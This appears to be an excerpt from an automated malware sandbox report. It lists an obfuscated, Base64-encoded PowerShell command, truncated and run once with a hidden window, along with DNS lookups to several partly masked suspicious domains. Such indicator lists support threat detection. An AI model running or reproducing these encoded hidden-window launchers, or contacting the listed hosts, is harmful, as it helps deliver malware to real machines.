Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enc PAAjACAAWABxAGsAcwBhAGgAeQBnAHEAIABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBtAGkAYwByAG8AcwBvAGYAdAAuAGMAbwBtAC8ARwBmAHIAZwBuAHcAdgByAGwAaAB2AGsAaAAgACMAPgAgACQAQwB4AGcAbgBtAGwAdABnAHQAbwB1AD0AJwBR...
- DNS ASK bo###boten.com
- DNS ASK sh##.##lanja-rak.com
- DNS ASK wp.####conference.com
- DNS ASK st#####.#herobertstreethub.com
- DNS ASK mu########argasinternacionales.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enc PAAjACAAWABxAGsAcwBhAGgAeQBnAHEAIABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBtAGkAYwByAG8AcwBvAGYAdAAuAGMAbwBtAC8ARwBmAHIAZwBuAHcAdgByAGwAaAB2AGsAaAAgACMAPgAgACQAQwB4AGcAbgBtAGwAdABnAHQAbwB1AD0AJwBR...' (with hidden window)